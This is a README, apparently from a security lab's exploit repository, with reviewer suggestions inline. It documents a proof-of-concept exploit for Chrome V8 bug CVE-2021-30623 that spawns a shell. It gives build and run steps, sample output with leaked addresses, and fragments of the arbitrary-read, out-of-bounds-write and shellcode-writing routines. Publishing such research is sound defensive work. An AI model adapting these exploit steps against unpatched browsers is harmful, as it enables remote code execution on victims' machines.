Blog material (#438)
github/securitylab: SecurityExploits/Chrome/v8/CVE-2021-30623/README.md

## Chrome in-the-wild bug CVE-2021-30623

The analysis of this bug can be found [here](https://securitylab.github.com/research/in_the_wild_chrome_cve_2021_30623). This is a Chrome bug that is reported by an anonymous researcher and was believed to be exploited in the wild.

The exploit here is tested on `v8` version 9.3.345.16 (commit `632e6e7`), which is the version shipped with Chrome 93.0.4577.63, the one before the bug is fixed, on Ubuntu 20.04. I have not tested it on Chrome itself.

To test, check out `v8` at commit `632e6e7` and compile with the default settings using `tools/dev/gm.py x64.release`. Then open the file `poc.js` with `d8`:

```
./d8 poc.js
```

On Ubuntu 20.04, it should call `execve("/bin/sh")` to spawn a new process:

```
./d8 poc.js
instance: 81d42dd
elements: 804abd9
rwx page address: 22c70c88b000
intArray addr: 8105d79
intBackingStore: 56498ceb25e0
$
```

Shell code may need changing on other platforms.

> The exploit is very reliable, however, when testing, I notice that some offsets appear to be sensitive to small changes in the file (even adding comments may cause problem), which would cause the exploit to fail. This only happens when the file is modified and usually manifest itself with some garbage values of the addresses, for example:

Reviewer: ```suggestion
The exploit is very reliable, however, when testing, I notice that some offsets appear to be sensitive to small changes in the file (even adding comments may cause problem), which would cause the exploit to fail. This only happens when the file is modified and usually manifests itself with some garbage values of the addresses, for example:
```

```
function arbRead(addr) {
  [elements, addr1] = ftoi32(addrs[1]);  //<---- change this to [addr1, elements] = ftoi32(addrs[1]);
  oobWrite(i32tof(addr,addr1));          //<---- change to   oobWrite(i32tof(addr1,addr));
  return writeArr[0];
}
...
function writeShellCode(rwxAddr, shellArr) {
  var intArr = new Uint8Array(400);
  var intArrAddr = addrOf(intArr);
  console.log("intArray addr: " + intArrAddr.toString(16));
  var intBackingStore = ftoi(arbRead(intArrAddr + 0x20));
  console.log("intBackingStore: " + ftoi(arbRead(intArrAddr + 0x20)).toString(16));

  [elements, addr1] = ftoi32(addrs[1]);              //<------ change this to [addr1, elements] = ftoi32(addrs[1]);
  oobWrite(i32tof(intArrAddr + 0x20, addr1));        //<------ change this to oobWrite(i32tof(addr1, intArrAddr + 0x20));
  ...
}
...
var elementsAddr = ftoi32(addrs[1])[0];             //<------- change this to var elementsAddr = ftoi32(addrs[1])[1];
```

> This, however, does not affect the reliability of the exploit as the offsets are stable as long as the file is fixed, but it may cause issues the poc is modified. I do not know what causes this, but the exploit can probably be made more robust against this by matching pattern in memory instead of relying on fixed offsets.

Reviewer: ```suggestion
This, however, does not affect the reliability of the exploit as the offsets are stable as long as the file is fixed, but it may cause issues if the poc is modified. I do not know what causes this, but the exploit can probably be made more robust against this by matching patterns in memory instead of relying on fixed offsets.
```
